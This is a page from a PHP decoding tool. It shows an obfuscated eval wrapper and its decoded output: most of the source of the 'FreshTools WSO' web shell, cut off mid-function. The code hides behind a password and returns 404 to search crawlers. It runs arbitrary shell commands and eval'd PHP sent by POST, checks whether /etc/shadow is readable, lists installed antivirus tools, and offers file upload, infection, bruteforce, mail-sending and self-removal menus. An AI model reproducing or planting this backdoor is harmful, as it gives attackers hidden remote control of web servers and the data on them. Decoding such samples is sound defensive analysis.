Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval( str_rot13( gzuncompress( base64_decode( ..
Decoded Output download
$ = 'd01fbdd6c2e7038f24da35ec6e860e28';
$ = true;
$ = 'UTF-8';
$ = 'FilesMan';
$ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'key', $);
}
if (empty($_POST['charset'])) {
$_POST['charset'] = $;
}
if (!isset($_POST['ne'])) {
if (isset($_POST['a'])) {
$_POST['a'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['a'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['c'])) {
$_POST['c'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['c'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p1'])) {
$_POST['p1'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p1'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p2'])) {
$_POST['p2'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p2'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p3'])) {
$_POST['p3'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p3'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
}
function decrypt($str, $pwd)
{
$pwd = base64_encode($pwd);
$str = base64_decode($str);
$enc_chr = '';
$enc_str = '';
$i = 0;
while ($i < strlen($str)) {
for ($j = 0; $j < strlen($pwd); $j++) {
$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
$enc_str .= $enc_chr;
$i++;
if ($i >= strlen($str)) {
break;
}
}
}
return base64_decode($enc_str);
}
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@define('VERSION', '1.0');
/* () 11.2011 oRb */
if (!empty($)) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $) {
prototype(md5($_SERVER['HTTP_HOST']), $);
}
if (
!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) ||
$_COOKIE[md5($_SERVER['HTTP_HOST'])] != $
) {
hardLogin();
}
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $;
}
function hardLogin()
{
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = [
'Google',
'Slurp',
'MSNBot',
'ia_archiver',
'Yandex',
'Rambler',
];
if (
preg_match(
'/' . implode('|', $userAgents) . '/i',
$_SERVER['HTTP_USER_AGENT']
)
) {
header('HTTP/1.0 404 Not Found');
exit();
}
}
die(
"<html><head>
<meta name='description' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='keywords' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='author' content='FreshTools'>
<meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST['charset'] .
"'><title>" .
$_SERVER['HTTP_HOST'] .
' freshtools wso ' .
VERSION .
"</title> </head><body><div style='background-color: #040d14;
background-image: url(https://www.transparenttextures.com/patterns/gradient-squares.png);
position: absolute;
height: 100%;
width: 100%;
top: 0;
bottom: 0;
left: 0;
right: 0;
display: flex;
justify-content: center;'><pre align=center><form method=post><p style='font-size: 18px;
color: #fff;
font-weight: bold;
'>Password</p><input type=password name=pass style='margin-right: 0px;
color: #fff;
background-color: #202832;
border: none;
font: 9pt Courier New;
outline: none;
height: 31px;
border-radius: 12px;
width:200px;
margin-right: 6px;outline:none;' required><input type=submit name='mypass' value='submit' style='border:none;background-color:#margin-right: 0px;
color: #fff;
background-color: #202832;
border: none;
font: 9pt Courier New;
outline: none;
height: 31px;
border-radius: 12px;
margin-right: 6px;;color:#fff;cursor:pointer;'></form></pre></div></body></html>"
);
}
if (strtolower(substr(PHP_OS, 0, 3)) == 'win') {
$os = 'win';
} else {
$os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) {
error_reporting(0);
}
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
@chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace('\', '/', $home_cwd);
$cwd = str_replace('\', '/', $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
/* () 04.2015 Pirat */
function hardHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS[''];
}
echo "<html><head>
<meta name='description' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='keywords' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='author' content='FreshTools'>
<meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST['charset'] .
"'><title>" .
$_SERVER['HTTP_HOST'] .
' freshtools wso ' .
VERSION .
"</title>
<style>
body { background: rgb(250,250,250);
background: linear-gradient(180deg, rgba(250,250,250,1) 27%, rgba(251,233,231,0.9009804605435925) 100%); height:100% }
#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
table.info {color:#757575;}
span,h1,a {color:#616161 !important;}
span {font-weight:bolder;}
h1 {border-left:20px solid #E91E63;border-bottom-left-radius:8px;border-top-left-radius:8px;padding:2px 5px;font:14pt Verdana;margin-left:5px;margin-top:8px;margin-bottom:8px}
div.content {padding: 10px;
margin: 15px;
box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;
background:#fff;
border-radius: 8px;}
a {text-decoration:none;}
a:hover {text-decoration:underline;}
.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
.tooltip:hover::after {opacity:1;visibility:visible;}
.ml1 {border: 3px solid #FFF3E0;
background: #FFF8E1;
padding: 10px;
margin: 3px;
overflow: auto;
background: rgba();
color: #424242;
border-radius: 6px;}
.bigarea {min-width:100%;max-width:100%;height:400px; height: 31px;}
input, textarea , select {margin: 0;
margin-right: 0px;
border-radius: 12px;
margin-right: 6px;
height: calc(1.6em + 0.75rem + 2px);
padding: 0.375rem 0.75rem;
font-size: 0.9rem;
font-weight: 400;
line-height: 1.6;
color: #495057;
background-color: #fff;
label::before {
display:none;
}
label::after {
display:none;
}
background-clip: padding-box;
border: 1px solid #ced4da;
border-radius: 0.25rem;
transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
label {position:relative}
form {margin:0px;}
#toolsTbl {text-align:center;}
#fak {background:none;}
#fak td {padding:5px 0 0 0;}
iframe {border:1px solid #060a10;}
.toolsInp {width:300px}
.main th {text-align: left;
font-weight: bold;
font-size: 16px;
color: #B0BEC5 !important;}
.main th a{
color:#B0BEC5!important;
}
.main tr:hover{background-color:#FBE9E7; cursor: pointer;
}
.main td, th{vertical-align:middle;}
input[type='submit'] , input[type='button']{
background: #EC407A; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #EC407A, #E91E63); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #EC407A, #E91E63); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
text-align: center;
transition: 0.5s;
background-size: 200% auto;
color: white !important;
border-radius: 10px;
border: none;
box-shadow: none;
}
input[type='submit']:hover , input[type='button']:hover {
background-position: right center; /* change the direction of the change here */
color: #fff;
text-decoration: none;
cursor: pointer;
}
.l1 {background-color:#EEEEEE;}
pre {font:9pt Courier New;}
.menu-header{
background: #fff;
height: 49px;
display: flex;
align-items: center;
justify-content: center;
box-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;
margin-top:8px;
margin-bottom:8px;
}
.menu-header table{
height:40px;
}
.content table tr{
height:23px;
color:#616161
}
.send_mail_form input[type='text']{
width:40%;
}
.send_mail_form textarea{
width:40%;
height:120px;
}
.tab-item{
padding: 7px;
width: 106px;
margin-left: 23px;
background: #56ab2f; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #56ab2f, #a8e063); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #56ab2f, #a8e063); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
padding: 9px;
text-align: center;
transition: 0.5s;
background-size: 200% auto;
color: white !important;
border-radius: 10px;
border: none;
box-shadow: none;
}
.tab-item:hover{
background-position: right center; /* change the direction of the change here */
color: #fff;
text-decoration: none;
cursor: pointer;
}
.badge-info {
background: #E0E0E0;
color: #616161 !important;
padding: 5px;
border-radius: 15px;
}
.output-result{
padding: 10px;
margin: 3px;
overflow: auto;
border-radius:5px;
margin-top:10px;
margin-bottom:20px;
min-height:50px;
border: 3px solid #FFF3E0;
background: #FFF8E1;
}
</style>
<script>
var c_ = '" .
htmlspecialchars($GLOBALS['cwd']) .
"';
var a_ = '" .
htmlspecialchars(@$_POST['a']) .
"'
var charset_ = '" .
htmlspecialchars(@$_POST['charset']) .
"';
var p1_ = '" .
(strpos(@$_POST['p1'], "
") !== false
? ''
: htmlspecialchars($_POST['p1'], ENT_QUOTES)) .
"';
var p2_ = '" .
(strpos(@$_POST['p2'], "
") !== false
? ''
: htmlspecialchars($_POST['p2'], ENT_QUOTES)) .
"';
var p3_ = '" .
(strpos(@$_POST['p3'], "
") !== false
? ''
: htmlspecialchars($_POST['p3'], ENT_QUOTES)) .
"';
var d = document;
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
d.mf.a.value = encrypt(d.mf.a.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.c.value = encrypt(d.mf.c.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p1.value = encrypt(d.mf.p1.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p2.value = encrypt(d.mf.p2.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p3.value = encrypt(d.mf.p3.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" .
addslashes($_SERVER['REQUEST_URI']) .
"', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink =
'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
if (strpos('Linux', $kernel) !== false) {
$explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = '?';
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode('/', $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . '/</a>';
}
$charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'];
$opt_charsets = '';
foreach ($charsets as $) {
$opt_charsets .=
'<option value="' .
$ .
'" ' .
($_POST['charset'] == $ ? 'selected' : '') .
'>' .
$ .
'</option>';
}
$m = [
'Sec. Info' => 'SecInfo',
'Files' => 'FilesMan',
'Send mail' => 'SendMail',
'Console' => 'Console',
'Infect' => 'Infect',
'Sql' => 'Sql',
'Php' => 'Php',
'Safe mode' => 'SafeMode',
'String tools' => 'StringTools',
'Bruteforce' => 'Bruteforce',
'Network' => 'Network',
];
if (!empty($GLOBALS[''])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .=
'<button class="tab-item" onclick="g(\'' .
$v .
'\',null,\'\',\'\',\'\')">' .
$k .
'</button>';
}
$drives = '';
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\')) {
$drives .=
'<a href="#" onclick="g(\'FilesMan\',\'' .
$drive .
':/\')">[ ' .
$drive .
' ]</a> ';
}
}
}
/* () 08.2015 dmkcv */
echo '<table class="info" cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' .
($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') .
'</span></td>' .
'<td><nobr>' .
substr(@php_uname(), 0, 120) .
' <a href="http://noreferer.de/?http://www.google.com/search?q=' .
urlencode(@php_uname()) .
'" target="_blank">[ Google ]</a> <a href="' .
$explink .
'" target=_blank>[ Exploit-DB ]</a></nobr><br>' .
$uid .
' ( ' .
$user .
' ) <span>Group:</span> ' .
$gid .
' ( ' .
$group .
' )<br>' .
@phpversion() .
' <span>Safe mode:</span> ' .
($GLOBALS['safe_mode']
? '<font color=red>ON</font>'
: '<font color=#FFDB5F><b>OFF</b></font>') .
' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' .
date('Y-m-d H:i:s') .
'<br>' .
viewSize($totalSpace) .
' <span>Free:</span> ' .
viewSize($freeSpace) .
' (' .
round(100 / ($totalSpace / $freeSpace), 2) .
'%)<br>' .
$cwd_links .
' ' .
viewPermsColor($GLOBALS['cwd']) .
' <a href=# onclick="g(\'FilesMan\',\'' .
$GLOBALS['home_cwd'] .
'\',\'\',\'\',\'\')">[ home ]</a><br>' .
$drives .
'</td>' .
'<td><h1 style="border:none">Freshtools</h1></td>' .
'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">' .
$opt_charsets .
'</select></label><br><span>Server IP:</span><br>' .
gethostbyname($_SERVER['HTTP_HOST']) .
'<br><span>Client IP:</span><br>' .
$_SERVER['REMOTE_ADDR'] .
'</nobr></td></tr></table>' .
'<div class="menu-header">' .
$menu .
'</div><div>';
}
function hardFooter()
{
$is_writable = is_writable($GLOBALS['cwd'])
? " <font color='#FFDB5F'>[ Writeable ]</font>"
: ' <font color=red>(Not writable)</font>';
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
<tr>
<td><form onsubmit=\"" .
(function_exists('actionFilesMan') ? "g(null,this.c.value,'');" : '') .
"return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'><input type=submit value='submit'></form></td>
<td><form onsubmit=\"" .
(function_exists('actionFilesTools')
? "g('FilesTools',null,this.f.value);"
: '') .
"return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
</tr><tr>
<td><form onsubmit=\"" .
(function_exists('actionFilesMan')
? "g('FilesMan',null,'mkdir',this.d.value);"
: '') .
"return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
<td><form onsubmit=\"" .
(function_exists('actionFilesTools')
? "g('FilesTools',null,this.f.value,'mkfile');"
: '') .
"return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
</tr><tr>
<td><form onsubmit=\"" .
(function_exists('actionConsole')
? "g('Console',null,this.c.value);"
: '') .
"return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
<td><form method='post' " .
(!function_exists('actionFilesMan')
? " onsubmit=\"return false;\" "
: '') .
"ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=ne value=''>
<input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>
</tr></table></div>
</body></html>";
}
if (
!function_exists('posix_getpwuid') &&
strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false
) {
function posix_getpwuid($p)
{
return false;
}
}
if (
!function_exists('posix_getgrgid') &&
strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false
) {
function posix_getgrgid($p)
{
return false;
}
}
function ex($in)
{
$ = '';
if (function_exists('exec')) {
@exec($in, $);
$ = @join("
", $);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$ = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$ = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$ = shell_exec($in);
} elseif (is_resource($f = @popen($in, 'r'))) {
$ = '';
while (!@feof($f)) {
$ .= fread($f, 1024);
}
pclose($f);
} else {
return " Unable to execute command
";
}
return $ == '' ? " Query did not return anything
" : $;
}
function viewSize($s)
{
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function perms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x0100 ? 'r' : '-';
$i .= $p & 0x0080 ? 'w' : '-';
$i .= $p & 0x0040 ? ($p & 0x0800 ? 's' : 'x') : ($p & 0x0800 ? 'S' : '-');
$i .= $p & 0x0020 ? 'r' : '-';
$i .= $p & 0x0010 ? 'w' : '-';
$i .= $p & 0x0008 ? ($p & 0x0400 ? 's' : 'x') : ($p & 0x0400 ? 'S' : '-');
$i .= $p & 0x0004 ? 'r' : '-';
$i .= $p & 0x0002 ? 'w' : '-';
$i .= $p & 0x0001 ? ($p & 0x0200 ? 't' : 'x') : ($p & 0x0200 ? 'T' : '-');
return $i;
}
function viewPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000><b>' .
perms(@fileperms($f)) .
'</b></font>';
} elseif (!@is_writable($f)) {
return '<font ><b>' . perms(@fileperms($f)) . '</b></font>';
} else {
return '<font color=#FFDB5F><b>' .
perms(@fileperms($f)) .
'</b></font>';
}
}
function hardScandir($dir)
{
if (function_exists('scandir')) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p)
{
$path = ex('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function actionRC()
{
if (!@$_POST['p1']) {
$a = [
'uname' => php_uname(),
'php_version' => phpversion(),
'VERSION' => VERSION,
'safemode' => @ini_get('safe_mode'),
];
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
function prototype($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
function actionSecInfo()
{
hardHeader();
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "
") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml1>' . $v . '</pre>';
}
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) {
showSecParam(
'Loaded Apache modules',
implode(', ', apache_get_modules())
);
}
showSecParam(
'Disabled PHP Functions',
$GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'
);
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam(
'cURL support',
function_exists('curl_version') ? 'enabled' : 'no'
);
$temp = [];
if (function_exists('mysql_get_client_info')) {
$temp[] = 'MySql (' . mysql_get_client_info() . ')';
}
if (function_exists('mssql_connect')) {
$temp[] = 'MSSQL';
}
if (function_exists('pg_connect')) {
$temp[] = 'PostgreSQL';
}
if (function_exists('oci_connect')) {
$temp[] = 'Oracle';
}
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if ($GLOBALS['os'] == 'nix') {
showSecParam(
'Readable /etc/passwd',
@is_readable('/etc/passwd')
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>"
: 'no'
);
showSecParam(
'Readable /etc/shadow',
@is_readable('/etc/shadow')
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>"
: 'no'
);
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = [
'gcc',
'lcc',
'cc',
'ld',
'make',
'php',
'perl',
'python',
'ruby',
'tar',
'gzip',
'bzip',
'bzip2',
'nc',
'locate',
'suidperl',
];
$danger = [
'kav',
'nod32',
'bdcored',
'uvscan',
'sav',
'drwebd',
'clamd',
'rkhunter',
'chkrootkit',
'iptables',
'ipfw',
'tripwire',
'shieldcc',
'portsentry',
'snort',
'ossec',
'lidsadm',
'tcplodg',
'sxid',
'logcheck',
'logwatch',
'sysmask',
'zmbscap',
'sawmill',
'wormscan',
'ninja',
];
$downloaders = [
'wget',
'fetch',
'lynx',
'links',
'curl',
'get',
'lwp-mirror',
];
echo '<br>';
$temp = [];
foreach ($userful as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Userful', implode(', ', $temp));
$temp = [];
foreach ($danger as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Danger', implode(', ', $temp));
$temp = [];
foreach ($downloaders as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Downloaders', implode(', ', $temp));
echo '<br/>';
showSecParam('HDD space', ex('df -h'));
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version', ex('ver'));
showSecParam(
'Account Settings',
iconv('CP866', 'UTF-8', ex('net accounts'))
);
showSecParam('User Accounts', iconv('CP866', 'UTF-8', ex('net user')));
}
echo '</div>';
hardFooter();
}
function actionFilesTools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start('ob_gzhandler', 4096);
header(
'Content-Disposition: attachment; filename=' .
basename($_POST['p1'])
);
if (function_exists('mime_content_type')) {
$type = @mime_content_type($_POST['p1']);
header('Content-Type: ' . $type);
} else {
header('Content-Type: application/octet-stream');
}
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
}
exit();
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = 'edit';
fclose($fp);
}
}
}
hardHeader();
echo '<h1>File tools</h1><div class=content>';
if (!file_exists(@$_POST['p1'])) {
echo 'File not exists';
hardFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else {
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
}
echo '<div style="display: block ruby;"><span style="margin-left:8px">Name:</span> ' .
'<span class="badge-info">' .
htmlspecialchars(@basename($_POST['p1'])) .
'</span>' .
'<span style="margin-left:8px">Size:</span> ' .
'<span class="badge-info">' .
(is_file($_POST['p1']) ? viewSize(filesize($_POST['p1'])) : '-') .
'</span>' .
'<span style="margin-left:8px">Permission:</span> ' .
'<span class="badge-info">' .
viewPermsColor($_POST['p1']) .
'</span>' .
'<span style="margin-left:8px">Owner/Group:</span> ' .
'<span class="badge-info">' .
$uid['name'] .
'/' .
$gid['name'] .
'</span></div>' .
'<br>';
echo '<br/><span>Create time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', filectime($_POST['p1'])) .
'</span>' .
' <br/><br/><span>Access time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', fileatime($_POST['p1'])) .
'</span>' .
' <br/><br/><span>Modify time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', filemtime($_POST['p1'])) .
'</span>' .
'<br><br>';
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = [
'View',
'Highlight',
'Download',
'Hexdump',
'Edit',
'Chmod',
'Rename',
'Touch',
'Frame',
];
} else {
$m = ['Chmod', 'Rename', 'Touch'];
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',\'' .
strtolower($v) .
'\')">' .
(strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) .
'</a> ';
}
echo '<br><br>';
switch ($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if (@is_readable($_POST['p1'])) {
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$oRb = @highlight_file($_POST['p1'], true);
echo str_replace(
['<span ', '</span>'],
